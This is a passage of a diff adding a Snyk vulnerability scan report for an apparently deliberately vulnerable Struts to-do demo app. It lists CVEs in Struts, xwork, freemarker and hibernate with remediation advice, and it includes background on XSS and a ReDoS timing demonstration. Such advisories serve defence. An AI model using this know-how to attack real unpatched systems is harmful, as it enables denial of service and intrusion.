org.apache.struts:struts2-core@2.3.20\n### Detailed paths\n* _Introduced through_: 
io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT › org.apache.struts:struts2-core@2.3.20\n# Overview\n[org.apache.struts:struts2-core](https://github.com/apache/struts) is a popular open-source framework for developing web applications in the Java programming language.\n\nAffected versions of this package are vulnerable to Allocation of Resources Without Limits or Throttling due to improper handling of `getProperty()` by the `XWorkListPropertyAccessor` class.\r\nExploiting this vulnerability is possible if the developer has set `CreateIfNull` to true for the underlying Collection type field.\r\n\r\n# Workaround\r\n\r\nSet `CreateIfNull` to false for Collection type fields (it is false by default if not set).\n# Remediation\nUpgrade `org.apache.struts:struts2-core` to version 2.5.31, 6.1.2.1 or higher.\n# References\n- [GitHub Commit](https://github.com/apache/struts/commit/2d6f1bc0a6f5ac575a56784ac6461816b67c4f21)\n- [Security Advisory](https://cwiki.apache.org/confluence/display/WW/S2-063)\n" + }, + "properties": { + "tags": [ + "security", + "CWE-770", + "maven" + ], + "cvssv3_baseScore": 4.3, + "security-severity": "4.3" + } + }, + { + "id": "SNYK-JAVA-ORGAPACHESTRUTS-608098", + "shortDescription": { + "text": "High severity - Denial of Service (DoS) vulnerability in org.apache.struts:struts2-core" + }, + "fullDescription": { + "text": "(CVE-2019-0233) org.apache.struts:struts2-core@2.3.20" + }, + "help": { + "text": "", + "markdown": "* Package Manager: maven\n* Vulnerable module: org.apache.struts:struts2-core\n* Introduced through: io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT and org.apache.struts:struts2-core@2.3.20\n### Detailed paths\n* _Introduced through_: io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT › org.apache.struts:struts2-core@2.3.20\n# Overview\n[org.apache.struts:struts2-core](https://github.com/apache/struts) is a popular open-source framework for developing web applications in the Java programming language.\n\nAffected versions of 
this package are vulnerable to Denial of Service (DoS). When a file upload is performed to an `Action` that exposes the file with a getter, an attacker may manipulate the request such that the working copy of the uploaded file is set to read-only. As a result, subsequent actions on the file will fail with an error. It might also be possible to set the Servlet container's temp directory to read-only, such that subsequent upload actions will fail.\n# Remediation\nUpgrade `org.apache.struts:struts2-core` to version 2.5.22 or higher.\n# References\n- [Security Bulletin](https://cwiki.apache.org/confluence/display/WW/S2-060)\n" + }, + "properties": { + "tags": [ + "security", + "CWE-400", + "maven" + ], + "cvssv3_baseScore": 7.5, + "security-severity": "7.5" + } + }, + { + "id": "SNYK-JAVA-ORGAPACHESTRUTS-609765", + "shortDescription": { + "text": "High severity - Unrestricted Upload of File with Dangerous Type vulnerability in org.apache.struts:struts2-core" + }, + "fullDescription": { + "text": "(CVE-2012-1592) org.apache.struts:struts2-core@2.3.20" + }, + "help": { + "text": "", + "markdown": "* Package Manager: maven\n* Vulnerable module: org.apache.struts:struts2-core\n* Introduced through: io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT and org.apache.struts:struts2-core@2.3.20\n### Detailed paths\n* _Introduced through_: io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT › org.apache.struts:struts2-core@2.3.20\n# Overview\n[org.apache.struts:struts2-core](https://github.com/apache/struts) is a popular open-source framework for developing web applications in the Java programming language.\n\nAffected versions of this package are vulnerable to Unrestricted Upload of File with Dangerous Type. 
A local code execution issue exists in Apache Struts2 when processing malformed XSLT files, which could let a malicious user upload and execute arbitrary files.\n# Remediation\nUpgrade `org.apache.struts:struts2-core` to version 2.5 or higher.\n# References\n- [Bug Report](https://issues.apache.org/jira/browse/WW-5055)\n- [GitHub Commit](https://github.com/apache/struts/commit/4271682d2b944e9022e4e4c499df43e0ce7e58fd)\n" + }, + "properties": { + "tags": [ + "security", + "CWE-434", + "maven" + ], + "cvssv3_baseScore": 8.8, + "security-severity": "8.8" + } + }, + { + "id": "SNYK-JAVA-ORGAPACHESTRUTS-6100744", + "shortDescription": { + "text": "Medium severity - Denial of Service vulnerability in org.apache.struts:struts2-core" + }, + "fullDescription": { + "text": "(CVE-2023-41835) org.apache.struts:struts2-core@2.3.20" + }, + "help": { + "text": "", + "markdown": "* Package Manager: maven\n* Vulnerable module: org.apache.struts:struts2-core\n* Introduced through: io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT and org.apache.struts:struts2-core@2.3.20\n### Detailed paths\n* _Introduced through_: io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT › org.apache.struts:struts2-core@2.3.20\n# Overview\n[org.apache.struts:struts2-core](https://github.com/apache/struts) is a popular open-source framework for developing web applications in the Java programming language.\n\nAffected versions of this package are vulnerable to Denial of Service when certain fields exceed the `maxStringLength` limit during multipart requests. 
An attacker can exploit this to leave uploaded files in the `struts.multipart.saveDir` even after the request has been denied resulting in excessive disk usage.\n# Remediation\nUpgrade `org.apache.struts:struts2-core` to version 2.5.32, 6.1.2.2, 6.3.0.1 or higher.\n# References\n- [GitHub Commit](https://github.com/apache/struts/commit/3292152f8c0a77ee4827beede82b6580478a2c2a)\n- [GitHub Commit](https://github.com/apache/struts/commit/4c044f12560e22e00520595412830f9582d6dac7)\n- [GitHub Commit](https://github.com/apache/struts/commit/bf54436869c264941dd192c752a4abfaa65d3711)\n- [Struts Issue](https://cwiki.apache.org/confluence/display/WW/S2-065)\n" + }, + "properties": { + "tags": [ + "security", + "CWE-400", + "maven" + ], + "cvssv3_baseScore": 5.3, + "security-severity": "5.3" + } + }, + { + "id": "SNYK-JAVA-ORGAPACHESTRUTSXWORK-30798", + "shortDescription": { + "text": "High severity - Parameter Alteration vulnerability in org.apache.struts.xwork:xwork-core" + }, + "fullDescription": { + "text": "(CVE-2015-5209) org.apache.struts.xwork:xwork-core@2.3.20" + }, + "help": { + "text": "", + "markdown": "* Package Manager: maven\n* Vulnerable module: org.apache.struts.xwork:xwork-core\n* Introduced through: io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT, org.apache.struts:struts2-core@2.3.20 and others\n### Detailed paths\n* _Introduced through_: io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT › org.apache.struts:struts2-core@2.3.20 › org.apache.struts.xwork:xwork-core@2.3.20\n# Overview\n[`org.apache.struts.xwork:xwork-core`](http://search.maven.org/#search%7Cga%7C1%7Ca%3A%22xwork-core%22)\nAffected versions of the package are vulnerable to Parameter Alteration. ValueStack defines special top object which represents root of execution context. 
It can be used to manipulate Struts' internals or can be used to affect container's settings\n\n\n# References\n- [Apache Security Advisory](https://struts.apache.org/docs/s2-026.html)\n" + }, + "properties": { + "tags": [ + "security", + "CWE-235", + "maven" + ], + "cvssv3_baseScore": 7.5, + "security-severity": "7.5" + } + }, + { + "id": "SNYK-JAVA-ORGAPACHESTRUTSXWORK-30799", + "shortDescription": { + "text": "High severity - Improper Input Validation vulnerability in org.apache.struts.xwork:xwork-core" + }, + "fullDescription": { + "text": "(CVE-2016-0785) org.apache.struts.xwork:xwork-core@2.3.20" + }, + "help": { + "text": "", + "markdown": "* Package Manager: maven\n* Vulnerable module: org.apache.struts.xwork:xwork-core\n* Introduced through: io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT, org.apache.struts:struts2-core@2.3.20 and others\n### Detailed paths\n* _Introduced through_: io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT › org.apache.struts:struts2-core@2.3.20 › org.apache.struts.xwork:xwork-core@2.3.20\n# Overview\n[org.apache.struts.xwork:xwork-core](https://mvnrepository.com/artifact/org.apache.struts.xwork/xwork-core) is a generic command pattern framework. 
It forms the core of Struts 2.\n\nAffected versions of this package are vulnerable to Improper Input Validation via a `%{}` sequence in a tag attribute, aka forced double OGNL evaluation.\n# Remediation\nUpgrade `org.apache.struts.xwork:xwork-core` to version 2.3.28 or higher.\n# References\n- [GitHub Commit](https://github.com/apache/struts/commit/15857a69e7baf3675804495a5954cd0756ac8364)\n" + }, + "properties": { + "tags": [ + "security", + "CWE-20", + "maven" + ], + "cvssv3_baseScore": 8.8, + "security-severity": "8.8" + } + }, + { + "id": "SNYK-JAVA-ORGAPACHESTRUTSXWORK-30800", + "shortDescription": { + "text": "Medium severity - Cross-site Scripting (XSS) vulnerability in org.apache.struts.xwork:xwork-core" + }, + "fullDescription": { + "text": "(CVE-2016-2162) org.apache.struts.xwork:xwork-core@2.3.20" + }, + "help": { + "text": "", + "markdown": "* Package Manager: maven\n* Vulnerable module: org.apache.struts.xwork:xwork-core\n* Introduced through: io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT, org.apache.struts:struts2-core@2.3.20 and others\n### Detailed paths\n* _Introduced through_: io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT › org.apache.struts:struts2-core@2.3.20 › org.apache.struts.xwork:xwork-core@2.3.20\n# Overview\n[`org.apache.struts.xwork:xwork-core`](http://search.maven.org/#search%7Cga%7C1%7Ca%3A%22xwork-core%22)\nApache Struts 2.x before 2.3.25 does not sanitize text in the Locale object constructed by I18NInterceptor, which might allow remote attackers to conduct cross-site scripting (XSS) attacks via unspecified vectors involving language display.\n\n# Details\nA cross-site scripting attack occurs when the attacker tricks a legitimate web-based application or site to accept a request as originating from a trusted source.\r\n\r\nThis is done by escaping the context of the web application; the web application then delivers that data to its users along with other trusted dynamic content, without validating it. 
The browser unknowingly executes malicious script on the client side (through client-side languages; usually JavaScript or HTML) in order to perform actions that are otherwise typically blocked by the browser’s Same Origin Policy.\r\n\r\nֿInjecting malicious code is the most prevalent manner by which XSS is exploited; for this reason, escaping characters in order to prevent this manipulation is the top method for securing code against this vulnerability.\r\n\r\nEscaping means that the application is coded to mark key characters, and particularly key characters included in user input, to prevent those characters from being interpreted in a dangerous context. For example, in HTML, `<` can be coded as `<`; and `>` can be coded as `>`; in order to be interpreted and displayed as themselves in text, while within the code itself, they are used for HTML tags. If malicious content is injected into an application that escapes special characters and that malicious content uses `<` and `>` as HTML tags, those characters are nonetheless not interpreted as HTML tags by the browser if they’ve been correctly escaped in the application code and in this way the attempted attack is diverted.\r\n \r\nThe most prominent use of XSS is to steal cookies (source: OWASP HttpOnly) and hijack user sessions, but XSS exploits have been used to expose sensitive information, enable access to privileged services and functionality and deliver malware. \r\n\r\n## Types of attacks\r\nThere are a few methods by which XSS can be manipulated:\r\n\r\n|Type|Origin|Description|\r\n|--|--|--|\r\n|**Stored**|Server|The malicious code is inserted in the application (usually as a link) by the attacker. The code is activated every time a user clicks the link.|\r\n|**Reflected**|Server|The attacker delivers a malicious link externally from the vulnerable web site application to a user. 
When clicked, malicious code is sent to the vulnerable web site, which reflects the attack back to the user’s browser.| \r\n|**DOM-based**|Client|The attacker forces the user’s browser to render a malicious page. The data in the page itself delivers the cross-site scripting data.|\r\n|**Mutated**| |The attacker injects code that appears safe, but is then rewritten and modified by the browser, while parsing the markup. An example is rebalancing unclosed quotation marks or even adding quotation marks to unquoted parameters.|\r\n\r\n## Affected environments\r\nThe following environments are susceptible to an XSS attack:\r\n\r\n* Web servers\r\n* Application servers\r\n* Web application environments\r\n\r\n## How to prevent\r\nThis section describes the top best practices designed to specifically protect your code: \r\n\r\n* Sanitize data input in an HTTP request before reflecting it back, ensuring all data is validated, filtered or escaped before echoing anything back to the user, such as the values of query parameters during searches. \r\n* Convert special characters such as `?`, `&`, `/`, `<`, `>` and spaces to their respective HTML or URL encoded equivalents. 
\r\n* Give users the option to disable client-side scripts.\r\n* Redirect invalid requests.\r\n* Detect simultaneous logins, including those from two separate IP addresses, and invalidate those sessions.\r\n* Use and enforce a Content Security Policy (source: Wikipedia) to disable any features that might be manipulated for an XSS attack.\r\n* Read the documentation for any of the libraries referenced in your code to understand which elements allow for embedded HTML.\n\n\n# References\n- [NVD](https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2016-2162)" + }, + "properties": { + "tags": [ + "security", + "CWE-79", + "maven" + ], + "cvssv3_baseScore": 6.1, + "security-severity": "6.1" + } + }, + { + "id": "SNYK-JAVA-ORGAPACHESTRUTSXWORK-30801", + "shortDescription": { + "text": "Medium severity - Improper Input Validation vulnerability in org.apache.struts.xwork:xwork-core" + }, + "fullDescription": { + "text": "(CVE-2016-3093) org.apache.struts.xwork:xwork-core@2.3.20" + }, + "help": { + "text": "", + "markdown": "* Package Manager: maven\n* Vulnerable module: org.apache.struts.xwork:xwork-core\n* Introduced through: io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT, org.apache.struts:struts2-core@2.3.20 and others\n### Detailed paths\n* _Introduced through_: io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT › org.apache.struts:struts2-core@2.3.20 › org.apache.struts.xwork:xwork-core@2.3.20\n# Overview\n[`org.apache.struts.xwork:xwork-core`](http://search.maven.org/#search%7Cga%7C1%7Ca%3A%22xwork-core%22)\nApache Struts 2.0.0 through 2.3.24.1 does not properly cache method references when used with OGNL before 3.0.12, which allows remote attackers to cause a denial of service (block access to a web site) via unspecified vectors.\n\n# References\n- [NVD](https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2016-3093)" + }, + "properties": { + "tags": [ + "security", + "CWE-20", + "maven" + ], + "cvssv3_baseScore": 5.3, + "security-severity": "5.3" + } + }, + { + 
"id": "SNYK-JAVA-ORGAPACHESTRUTSXWORK-30802", + "shortDescription": { + "text": "High severity - Access Restriction Bypass vulnerability in org.apache.struts.xwork:xwork-core" + }, + "fullDescription": { + "text": "(CVE-2016-4433) org.apache.struts.xwork:xwork-core@2.3.20" + }, + "help": { + "text": "", + "markdown": "* Package Manager: maven\n* Vulnerable module: org.apache.struts.xwork:xwork-core\n* Introduced through: io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT, org.apache.struts:struts2-core@2.3.20 and others\n### Detailed paths\n* _Introduced through_: io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT › org.apache.struts:struts2-core@2.3.20 › org.apache.struts.xwork:xwork-core@2.3.20\n# Overview\n[org.apache.struts.xwork:xwork-core](https://mvnrepository.com/artifact/org.apache.struts.xwork/xwork-core) is a generic command pattern framework. It forms the core of Struts 2.\n\nAffected versions of this package are vulnerable to Access Restriction Bypass. It allows remote attackers to bypass intended access restrictions and conduct redirection attacks via a crafted request.\n# Remediation\n# References\n- [GitHub Commit](https://github.com/apache/struts/commit/b28b78c062f0bf3c79793a25aab8c9b6c12bce6e)\n- [NVD](https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2016-4433)\n" + }, + "properties": { + "tags": [ + "security", + "CWE-20", + "maven" + ], + "cvssv3_baseScore": 7.5, + "security-severity": "7.5" + } + }, + { + "id": "SNYK-JAVA-ORGAPACHESTRUTSXWORK-30803", + "shortDescription": { + "text": "High severity - Arbitrary Code Execution vulnerability in org.apache.struts.xwork:xwork-core" + }, + "fullDescription": { + "text": "(CVE-2016-4461) org.apache.struts.xwork:xwork-core@2.3.20" + }, + "help": { + "text": "", + "markdown": "* Package Manager: maven\n* Vulnerable module: org.apache.struts.xwork:xwork-core\n* Introduced through: io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT, org.apache.struts:struts2-core@2.3.20 and others\n### Detailed paths\n* 
_Introduced through_: io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT › org.apache.struts:struts2-core@2.3.20 › org.apache.struts.xwork:xwork-core@2.3.20\n# Overview\n[`org.apache.struts.xwork:xwork-core`](http://search.maven.org/#search%7Cga%7C1%7Ca%3A%22xwork-core%22)\nAffected versions of the package are vulnerable to Remote code Execution. The Apache Struts frameworks when forced, performs double evaluation of attributes' values assigned to certain tags so it is possible to pass in a value that will be evaluated again when a tag's attributes will be rendered.\n\n# References\n- [Apache Security Advisory](https://struts.apache.org/docs/s2-036.html)\n" + }, + "properties": { + "tags": [ + "security", + "CWE-264", + "maven" + ], + "cvssv3_baseScore": 8.8, + "security-severity": "8.8" + } + }, + { + "id": "SNYK-JAVA-ORGAPACHESTRUTSXWORK-30804", + "shortDescription": { + "text": "Medium severity - Regular Expression Denial of Service (ReDoS) vulnerability in org.apache.struts.xwork:xwork-core" + }, + "fullDescription": { + "text": "(CVE-2016-4465) org.apache.struts.xwork:xwork-core@2.3.20" + }, + "help": { + "text": "", + "markdown": "* Package Manager: maven\n* Vulnerable module: org.apache.struts.xwork:xwork-core\n* Introduced through: io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT, org.apache.struts:struts2-core@2.3.20 and others\n### Detailed paths\n* _Introduced through_: io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT › org.apache.struts:struts2-core@2.3.20 › org.apache.struts.xwork:xwork-core@2.3.20\n# Overview\n[org.apache.struts.xwork:xwork-core](https://mvnrepository.com/artifact/org.apache.struts.xwork/xwork-core) is a generic command pattern framework. It forms the core of Struts 2.\n\nAffected versions of this package are vulnerable to Regular Expression Denial of Service (ReDoS). 
The URLValidator class allows remote attackers to cause a denial of service via a null value for a URL field.\n\n# Details\n\nDenial of Service (DoS) describes a family of attacks, all aimed at making a system inaccessible to its original and legitimate users. There are many types of DoS attacks, ranging from trying to clog the network pipes to the system by generating a large volume of traffic from many machines (a Distributed Denial of Service - DDoS - attack) to sending crafted requests that cause a system to crash or take a disproportional amount of time to process.\n\nThe Regular expression Denial of Service (ReDoS) is a type of Denial of Service attack. Regular expressions are incredibly powerful, but they aren't very intuitive and can ultimately end up making it easy for attackers to take your site down.\n\nLet’s take the following regular expression as an example:\n```js\nregex = /A(B|C+)+D/\n```\n\nThis regular expression accomplishes the following:\n- `A` The string must start with the letter 'A'\n- `(B|C+)+` The string must then follow the letter A with either the letter 'B' or some number of occurrences of the letter 'C' (the `+` matches one or more times). The `+` at the end of this section states that we can look for one or more matches of this section.\n- `D` Finally, we ensure this section of the string ends with a 'D'\n\nThe expression would match inputs such as `ABBD`, `ABCCCCD`, `ABCBCCCD` and `ACCCCCD`\n\nIt most cases, it doesn't take very long for a regex engine to find a match:\n\n```bash\n$ time node -e '/A(B|C+)+D/.test(\"ACCCCCCCCCCCCCCCCCCCCCCCCCCCCD\")'\n0.04s user 0.01s system 95% cpu 0.052 total\n\n$ time node -e '/A(B|C+)+D/.test(\"ACCCCCCCCCCCCCCCCCCCCCCCCCCCCX\")'\n1.79s user 0.02s system 99% cpu 1.812 total\n```\n\nThe entire process of testing it against a 30 characters long string takes around ~52ms. 
But when given an invalid string, it takes nearly two seconds to complete the test, over ten times as long as it took to test a valid string. The dramatic difference is due to the way regular expressions get evaluated.\n\nMost Regex engines will work very similarly (with minor differences). The engine will match the first possible way to accept the current character and proceed to the next one. If it then fails to match the next one, it will backtrack and see if there was another way to digest the previous character. If it goes too far down the rabbit hole only to find out the string doesn’t match in the end, and if many characters have multiple valid regex paths, the number of backtracking steps can become very large, resulting in what is known as _catastrophic backtracking_.\n\nLet's look at how our expression runs into this problem, using a shorter string: \"ACCCX\". While it seems fairly straightforward, there are still four different ways that the engine could match those three C's:\n1. CCC\n2. CC+C\n3. C+CC\n4. C+C+C.\n\nThe engine has to try each of those combinations to see if any of them potentially match against the expression. When you combine that with the other steps the engine must take, we can use [RegEx 101 debugger](https://regex101.com/debugger) to see the engine has to take a total of 38 steps before it can determine the string doesn't match.\n\nFrom there, the number of steps the engine must use to validate a string just continues to grow.\n\n| String | Number of C's | Number of steps |\n| -------|-------------:| -----:|\n| ACCCX | 3 | 38\n| ACCCCX | 4 | 71\n| ACCCCCX | 5 | 136\n| ACCCCCCCCCCCCCCX | 14 | 65,553\n\n\nBy the time the string includes 14 C's, the engine has to take over 65,000 steps just to see if the string is valid. 
These extreme situations can cause them to work very slowly (exponentially related to input size, as shown above), allowing an attacker to exploit this and can cause the service to excessively consume CPU, resulting in a Denial of Service.\n\n# Remediation\nUpgrade `org.apache.struts.xwork:xwork-core` to version 2.3.29 or higher.\n# References\n- [GitHub Commit](https://github.com/apache/struts/commit/a0fdca138feec2c2e94eb75ca1f8b76678b4d152)\n- [GitHub Commit](https://github.com/apache/struts/commit/eccc31ebce5430f9e91b9684c63eaaf885e603f9)\n- [NVD](https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2016-4465)\n" + }, + "properties": { + "tags": [ + "security", + "CWE-20", + "maven" + ], + "cvssv3_baseScore": 5.3, + "security-severity": "5.3" + } + }, + { + "id": "SNYK-JAVA-ORGAPACHESTRUTSXWORK-451611", + "shortDescription": { + "text": "High severity - Command Injection vulnerability in org.apache.struts.xwork:xwork-core" + }, + "fullDescription": { + "text": "(CVE-2016-3081) org.apache.struts.xwork:xwork-core@2.3.20" + }, + "help": { + "text": "", + "markdown": "* Package Manager: maven\n* Vulnerable module: org.apache.struts.xwork:xwork-core\n* Introduced through: io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT, org.apache.struts:struts2-core@2.3.20 and others\n### Detailed paths\n* _Introduced through_: io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT › org.apache.struts:struts2-core@2.3.20 › org.apache.struts.xwork:xwork-core@2.3.20\n# Overview\n[org.apache.struts.xwork:xwork-core](https://mvnrepository.com/artifact/org.apache.struts.xwork/xwork-core) is a generic command pattern framework. It forms the core of Struts 2.\n\nAffected versions of this package are vulnerable to Command Injection. 
When Dynamic Method Invocation was enabled, a remote attackers could execute arbitrary code via the prefix method, related to chained expressions.\n# Remediation\nUpgrade `org.apache.struts.xwork:xwork-core` to version 2.3.20.2, 2.3.24.2, 2.3.28.1 or higher.\n# References\n- [Exploit DB](https://exploit-db.com/exploits/39756)\n- [GitHub Commit](https://github.com/apache/struts/commit/f238cf4f1091be19fbcfd086b042c86a1bcaa7fc)\n- [NVD](https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2016-3081)\n- [Exploit DB](https://www.exploit-db.com/exploits/39756)\n- [Nuclei Templates](https://github.com/projectdiscovery/nuclei-templates/blob/master/cves/2016/CVE-2016-3081.yaml)\n" + }, + "properties": { + "tags": [ + "security", + "CWE-77", + "maven" + ], + "cvssv3_baseScore": 8.1, + "security-severity": "8.1" + } + }, + { + "id": "SNYK-JAVA-ORGAPACHESTRUTSXWORK-474418", + "shortDescription": { + "text": "High severity - Insecure Defaults vulnerability in org.apache.struts.xwork:xwork-core" + }, + "fullDescription": { + "text": "(CVE-2015-1831) org.apache.struts.xwork:xwork-core@2.3.20" + }, + "help": { + "text": "", + "markdown": "* Package Manager: maven\n* Vulnerable module: org.apache.struts.xwork:xwork-core\n* Introduced through: io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT, org.apache.struts:struts2-core@2.3.20 and others\n### Detailed paths\n* _Introduced through_: io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT › org.apache.struts:struts2-core@2.3.20 › org.apache.struts.xwork:xwork-core@2.3.20\n# Overview\n[org.apache.struts.xwork:xwork-core](https://mvnrepository.com/artifact/org.apache.struts.xwork/xwork-core) is a generic command pattern framework. It forms the core of Struts 2.\n\nAffected versions of this package are vulnerable to Insecure Defaults. 
The default exclude patterns (excludeParams) allow remote attackers to \"compromise internal state of an application\" via unspecified vectors.\n# Remediation\nUpgrade `org.apache.struts.xwork:xwork-core` to version 2.3.20.1 or higher.\n# References\n- [GitHub Commit](https://github.com/apache/struts/commit/5ebc0643b55d728a6713a82559a594d875452cd8)\n- [GitHub Commit](https://github.com/apache/struts/commit/d832747d647df343ed07a58b1b5e540a05a4d51b)\n- [Jira Issue](https://issues.apache.org/jira/browse/WW-4486)\n- [NVD](https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2015-1831)\n- [Struts Security Advisory](https://struts.apache.org/docs/s2-024.html)\n- [Vulnerability Summary](http://struts.apache.org/docs/s2-024.html)\n" + }, + "properties": { + "tags": [ + "security", + "CWE-453", + "maven" + ], + "cvssv3_baseScore": 7.3, + "security-severity": "7.3" + } + }, + { + "id": "SNYK-JAVA-ORGAPACHESTRUTSXWORK-5811864", + "shortDescription": { + "text": "High severity - Improper Input Validation vulnerability in org.apache.struts.xwork:xwork-core" + }, + "fullDescription": { + "text": "(CVE-2016-3090) org.apache.struts.xwork:xwork-core@2.3.20" + }, + "help": { + "text": "", + "markdown": "* Package Manager: maven\n* Vulnerable module: org.apache.struts.xwork:xwork-core\n* Introduced through: io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT, org.apache.struts:struts2-core@2.3.20 and others\n### Detailed paths\n* _Introduced through_: io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT › org.apache.struts:struts2-core@2.3.20 › org.apache.struts.xwork:xwork-core@2.3.20\n# Overview\n[org.apache.struts.xwork:xwork-core](https://mvnrepository.com/artifact/org.apache.struts.xwork/xwork-core) is a generic command pattern framework. 
It forms the core of Struts 2.\n\nAffected versions of this package are vulnerable to Improper Input Validation such that the `TextParseUtil.translateVariables` method allows remote attackers to execute arbitrary code via a crafted OGNL expression with ANTLR tooling.\r\n\r\n**Note:**\r\n\r\nThe Struts 2 framework does not pass any user-modifiable input to this method, neither directly nor indirectly. However, a developer crafting a Struts based web application might pass unsanitized user input to `TextParseUtil.translateVariables` or ActionSupport's `getText` methods. In that case a RCE exploitation might be possible.\r\n\r\n# Workaround\r\n\r\nUsers who are unable to upgrade to the fixed version should not pass unsanitized user input to framework methods that include OGNL expression evaluation.\n# Remediation\nUpgrade `org.apache.struts.xwork:xwork-core` to version 2.3.24.1 or higher.\n# References\n- [GitHub Commit](https://github.com/apache/struts/commit/f420f28466cb82915defc4e12466b298c275abaf)\n- [Issue](https://struts.apache.org/docs/s2-027.html)\n" + }, + "properties": { + "tags": [ + "security", + "CWE-20", + "maven" + ], + "cvssv3_baseScore": 8.8, + "security-severity": "8.8" + } + }, + { + "id": "SNYK-JAVA-ORGFREEMARKER-1076795", + "shortDescription": { + "text": "High severity - Server-side Template Injection (SSTI) vulnerability in org.freemarker:freemarker" + }, + "fullDescription": { + "text": "org.freemarker:freemarker@2.3.19" + }, + "help": { + "text": "", + "markdown": "* Package Manager: maven\n* Vulnerable module: org.freemarker:freemarker\n* Introduced through: io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT, org.apache.struts:struts2-core@2.3.20 and others\n### Detailed paths\n* _Introduced through_: io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT › org.apache.struts:struts2-core@2.3.20 › org.freemarker:freemarker@2.3.19\n# Overview\n[org.freemarker:freemarker](https://github.com/apache/freemarker) is a \"template engine\"; a generic tool 
to generate text output (anything from HTML to auto generated source code) based on templates.\n\nAffected versions of this package are vulnerable to Server-side Template Injection (SSTI). By allowing user input into `java.security.ProtectionDomain.getClassLoader`, templates will get access to the java classloader. This can be further leveraged for file system access and code execution. A low-privileged user is sufficient for exploitation of this vulnerability.\n# Remediation\nUpgrade `org.freemarker:freemarker` to version 2.3.30 or higher.\n# References\n- [GitHub PR](https://github.com/apache/freemarker/pull/62)\n- [Jira Issue](https://issues.apache.org/jira/browse/FREEMARKER-124)\n- [Research Blogpost](https://ackcent.com/in-depth-freemarker-template-injection/)\n" + }, + "properties": { + "tags": [ + "security", + "CWE-94", + "maven" + ], + "cvssv3_baseScore": 7.5, + "security-severity": "7.5" + } + }, + { + "id": "SNYK-JAVA-ORGHIBERNATE-1041788", + "shortDescription": { + "text": "High severity - SQL Injection vulnerability in org.hibernate:hibernate-core" + }, + "fullDescription": { + "text": "(CVE-2020-25638) org.hibernate:hibernate-core@4.3.7.Final" + }, + "help": { + "text": "", + "markdown": "* Package Manager: maven\n* Vulnerable module: org.hibernate:hibernate-core\n* Introduced through: io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT, io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT and others\n### Detailed paths\n* _Introduced through_: io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT › io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT › io.github.snyk:todolist-core@0.0.1-SNAPSHOT › org.hibernate:hibernate-core@4.3.7.Final\n# Overview\n[org.hibernate:hibernate-core](https://github.com/hibernate/hibernate-orm) is a library providing Object/Relational Mapping (ORM) support to applications, libraries, and frameworks.\n\nAffected versions of this package are vulnerable to SQL Injection. 
A SQL injection in the implementation of the JPA Criteria API can permit unsanitized literals when a literal is used in the SQL comments of the query. This flaw could allow an attacker to access unauthorized information or possibly conduct further attacks. The highest threat from this vulnerability is to data confidentiality and integrity.\n# Remediation\nUpgrade `org.hibernate:hibernate-core` to version 5.4.24.Final or higher.\n# References\n- [GitHub Commit](https://github.com/hibernate/hibernate-orm/commit/59fede7acaaa1579b561407aefa582311f7ebe78)\n- [Redhat CVE Details](https://access.redhat.com/security/cve/cve-2020-25638)\n" + }, + "properties": { + "tags": [ + "security", + "CWE-89", + "maven" + ], + "cvssv3_baseScore": 8.2, + "security-severity": "8.2" + } + }, + { + "id": "SNYK-JAVA-ORGHIBERNATE-584563", + "shortDescription": { + "text": "High severity - SQL Injection vulnerability in org.hibernate:hibernate-core" + }, + "fullDescription": { + "text": "(CVE-2019-14900) org.hibernate:hibernate-core@4.3.7.Final" + }, + "help": { + "text": "", + "markdown": "* Package Manager: maven\n* Vulnerable module: org.hibernate:hibernate-core\n* Introduced through: io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT, io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT and others\n### Detailed paths\n* _Introduced through_: io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT › io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT › io.github.snyk:todolist-core@0.0.1-SNAPSHOT › org.hibernate:hibernate-core@4.3.7.Final\n# Overview\n[org.hibernate:hibernate-core](https://github.com/hibernate/hibernate-orm) is a library providing Object/Relational Mapping (ORM) support to applications, libraries, and frameworks.\n\nAffected versions of this package are vulnerable to SQL Injection. A SQL injection in the implementation of the JPA Criteria API can permit unsanitized literals when a literal is used in the SELECT or GROUP BY parts of the query. 
